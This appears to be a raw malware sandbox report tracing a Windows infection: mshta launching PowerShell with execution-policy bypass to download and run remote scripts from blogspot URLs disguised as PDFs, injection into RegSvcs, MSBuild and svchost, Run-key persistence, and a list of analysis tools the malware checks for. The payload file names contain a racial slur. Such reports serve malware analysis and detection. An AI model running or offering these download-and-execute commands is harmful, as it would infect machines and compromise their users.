Source: unknown	Process created: C:\Windows\System32\mshta.exe "C:\Windows\system32\mshta.exe" "javascript:cfp=['RUN', 'powershell -ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;(irm https://hot7jan.blogspot.com///////nigger.pdf) \| . iex;Start-Sleep -Seconds 3;', 'WScript.Shell', 'Scripting.FileSyste
Source: unknown	Process created: C:\Windows\System32\mshta.exe C:\Windows\system32\mshta.EXE "javascript:zre=['RUN', 'powershell -ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;(irm https://hot7jan.blogspot.com///////nigger.pdf) \| . iex;Start-Sleep -Seconds 3;', 'WScript.Shell', 'Scripting.FileSystemObject']; new ActiveXObject(zre[2])[zre[0]](zre[1], 0, true);close();mgm=new ActiveXObject('Scripting.FileSystemObject');mgm.DeleteFile(WScript.ScriptFullName);"
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;(irm https://hot7jan.blogspot.com///////nigger.pdf) \| . iex;Start-Sleep -Seconds 3;
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\System32\mshta.exe "C:\Windows\system32\mshta.exe" "javascript:cfp=['RUN', 'powershell -ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;(irm https://hot7jan.blogspot.com///////nigger.pdf) \| . iex;Start-Sleep -Seconds 3;', 'WScript.Shell', 'Scripting.FileSyste
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;& ('{1}{0}' -f 'ex', 'I') $(irm https://7janmain.blogspot.com/////lund.pdf);Start-Sleep -Seconds 5;	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe"	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe"	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v3.5\Msbuild.exe"	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v3.5\Msbuild.exe"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Windows\System32\svchost.exe"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Windows\System32\svchost.exe"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe dw20.exe -x -s 932	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe dw20.exe -x -s 932	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exe	Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe dw20.exe -x -s 776	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exe	Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe dw20.exe -x -s 800	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;(irm https://hot7jan.blogspot.com///////nigger.pdf) \| . iex;Start-Sleep -Seconds 3;
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;(irm https://hot7jan.blogspot.com///////nigger.pdf) \| . iex;Start-Sleep -Seconds 3;

Source: 1.2.powershell.exe.18a20f80000.0.raw.unpack, jM6m4u9DWikmOWShtE6.cs	.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{.KQAAAA_003D_003D(typeof(IntPtr).TypeHandle),.KQAAAA_003D_003D(typeof(Type).TypeHandle)})
Source: 1.2.powershell.exe.18a313ece00.1.raw.unpack, jM6m4u9DWikmOWShtE6.cs	.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{.KQAAAA_003D_003D(typeof(IntPtr).TypeHandle),.KQAAAA_003D_003D(typeof(Type).TypeHandle)})

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_0523306A push esi; iretd	6_2_052330BA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_052358A5 push 0000002Eh; iretd	6_2_052358A8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_05E25507 push esp; retf	6_2_05E25509
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Code function: 8_2_012129A0 push esp; iretd	8_2_012129A1
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Code function: 9_2_013B29A0 push esp; iretd	9_2_013B29A1
Source: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exe	Code function: 10_2_00FC29A0 push esp; iretd	10_2_00FC29A1
Source: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exe	Code function: 11_2_013229A0 push esp; iretd	11_2_013229A1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 17_3_001A20EA push esi; iretd	17_3_001A213A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 17_3_001A4925 push 0000002Eh; iretd	17_3_001A4928
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 18_3_007520EA push esi; iretd	18_3_0075213A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 18_3_00754925 push 0000002Eh; iretd	18_3_00754928

Source: 1.2.powershell.exe.18a20f80000.0.raw.unpack, jM6m4u9DWikmOWShtE6.cs	High entropy of concatenated method names: 'S3lt65JOvAkgKQapRSR', 'mmUvE7J1mQoaNh2BJSU', 'LwwkAaysJm', 'bTBIO3JUyMl7KCmcxpW', 'JqG3rIJcxVXkM4J8FBQ', 'kaClBWJynQ24gIiTOE7', 'r4kTF1J0Wc4GRP0nB0b', 'ggwrAkJSIejCKDgJDbO', 'kYRerNJxFOW0qWgSKxg', 'oUdyyxJ2TX4flUBHGQA'
Source: 1.2.powershell.exe.18a20f80000.0.raw.unpack, B.cs	High entropy of concatenated method names: 'Main', 'PwoYlYevI', 'KimKarden', 'YV3DtKLh0', 'n5NUogKIH', 'nH7cxHWuZ', 'JrFye4Irj', 'DHA0GCrVK', 'dmGSSOMv3', 'NtGetContextThread'
Source: 1.2.powershell.exe.18a20f80000.0.raw.unpack, REGVHS9OeVXhsthj40r.cs	High entropy of concatenated method names: 'sIxKUwyJ2b', 'cGVMb4J8GfKVjTDSFhd', 'DwLdf3J9XExHHVe5TMY', 'QlcG81dBngQ5kD7jVdS', 'VXby9udzv3508LcC2xe', 'xmxCRJJkZoakVLTtHmM', 'vEyseRJRIv8wphecIgO', 'qBaMW4JdDfGnow0aa8i', 'NrsPVmJJVdEjmww5iB3'
Source: 1.2.powershell.exe.18a313ece00.1.raw.unpack, jM6m4u9DWikmOWShtE6.cs	High entropy of concatenated method names: 'S3lt65JOvAkgKQapRSR', 'mmUvE7J1mQoaNh2BJSU', 'LwwkAaysJm', 'bTBIO3JUyMl7KCmcxpW', 'JqG3rIJcxVXkM4J8FBQ', 'kaClBWJynQ24gIiTOE7', 'r4kTF1J0Wc4GRP0nB0b', 'ggwrAkJSIejCKDgJDbO', 'kYRerNJxFOW0qWgSKxg', 'oUdyyxJ2TX4flUBHGQA'
Source: 1.2.powershell.exe.18a313ece00.1.raw.unpack, B.cs	High entropy of concatenated method names: 'Main', 'PwoYlYevI', 'KimKarden', 'YV3DtKLh0', 'n5NUogKIH', 'nH7cxHWuZ', 'JrFye4Irj', 'DHA0GCrVK', 'dmGSSOMv3', 'NtGetContextThread'
Source: 1.2.powershell.exe.18a313ece00.1.raw.unpack, REGVHS9OeVXhsthj40r.cs	High entropy of concatenated method names: 'sIxKUwyJ2b', 'cGVMb4J8GfKVjTDSFhd', 'DwLdf3J9XExHHVe5TMY', 'QlcG81dBngQ5kD7jVdS', 'VXby9udzv3508LcC2xe', 'xmxCRJJkZoakVLTtHmM', 'vEyseRJRIv8wphecIgO', 'qBaMW4JdDfGnow0aa8i', 'NrsPVmJJVdEjmww5iB3'
Source: 1.2.powershell.exe.18a31d882e8.2.raw.unpack, Redist.cs	High entropy of concatenated method names: 'DecodePkt', 'GZipDecompress', 'CoreMain', 'Main', 'm2ukQQbRG9SKumn5kA', 'BjeCVBV7o1QToJpQqy', 'U8Xj6rnvYruQJ5kuv1', 'hL6AAdK8hkUmJnHEmB', 'L24J02z2EhRLJGo4qo', 'XHkverhebyeho5d5PXd'
Source: 1.2.powershell.exe.18a31d882e8.2.raw.unpack, CodeGen.cs	High entropy of concatenated method names: 'Ascii85ToBytes', 'FlutterToBytes', 'GetBytes', 'AAHauoX5wq60WQn6S2', 'FP094765pSR2eR27wS', 'DSToayL6L6Cq64xtcl', 'aOjbY8ake6dBpRdAQX', 'U24NZPxXqpJV7gRfEr', 'lYt9hZGMlYhl7lcP1W', 'o51OLplOHFYMpcp1oR'
Source: 1.2.powershell.exe.18a31d882e8.2.raw.unpack, bymALRf1lpiBkvXQPs.cs	High entropy of concatenated method names: 'leHifFIJCLsZtKEFfM1i', 'lA8byixHs', 'npynP5ID7', 'frGPLkUmg', 'B9QMQESRS', 'gW8I6urYX', 'efQiYYe9B', 'tOK6QO3G3', 'CATjlB2Pr', 'Fu0hXoi7j'
Source: 1.2.powershell.exe.18a31d882e8.2.raw.unpack, gBMthepoZSL1ZVKpeA.cs	High entropy of concatenated method names: 'xAejJhhQ6fHYlJ81E9b', 'mFtwVbhwtpP4GThV5cj', 'reTlcDMFua', 'tm0JeMhkUhnMaCML9Nr', 'nW4lBacjpc', 'sMLlkdoJ60', 'I5LlJVOMeQ', 'qdll7OAZFb', 'QEmlZSRGOw', 'tQNrorhM07E9VPZ4xC5'

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Uplatil-146			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Uplatistarlt-104			Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior

Source: svchost.exe, 00000011.00000002.2444457145.0000000000700000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: AUTORUNSC.EXE
Source: svchost.exe, 00000011.00000002.2444457145.0000000000700000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OLLYDBG.EXE
Source: svchost.exe, 00000011.00000002.2444457145.0000000000700000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: PPETOOLS.EXEAUTORUNSC.EXERESOURCEHACKER.EXEFILEMON.EXEREGMON.EXEWINDANR.EXE
Source: svchost.exe, 00000011.00000002.2444457145.0000000000700000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: EVERYWHERE.EXEFIDDLER.EXEIDA.EXEIDA64.EXEIMMU
Source: svchost.exe, 00000011.00000002.2444457145.0000000000700000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: X64DBG.EXE
Source: svchost.exe, 00000011.00000002.2444457145.0000000000700000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: REGMON.EXE
Source: svchost.exe, 00000011.00000002.2444457145.0000000000700000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: PETOOLS.EXE
Source: svchost.exe, 00000011.00000002.2444457145.0000000000700000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: FIDDLER.EXE
Source: svchost.exe, 00000011.00000002.2444457145.0000000000700000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: MP.EXEX64DBG.EXEX32DBG.EXEOLLYDBG.EXEPROCESSHA[
Source: svchost.exe, 00000011.00000002.2444457145.0000000000700000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: TORUNS.EXEDUMPCAP.EXEDE4
Source: svchost.exe, 00000011.00000002.2444457145.0000000000700000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: DUMPCAP.EXE
Source: svchost.exe, 00000011.00000002.2444457145.0000000000700000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: WINDANR.EXE
Source: svchost.exe, 00000011.00000002.2444457145.0000000000700000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: FILEMON.EXE

Source: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exe	Memory allocated: 12A0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exe	Memory allocated: 31E0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exe	Memory allocated: 1300000 memory commit \| memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exe	Memory allocated: 1380000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exe	Memory allocated: 3020000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exe	Memory allocated: 5020000 memory commit \| memory reserve \| memory write watch	Jump to behavior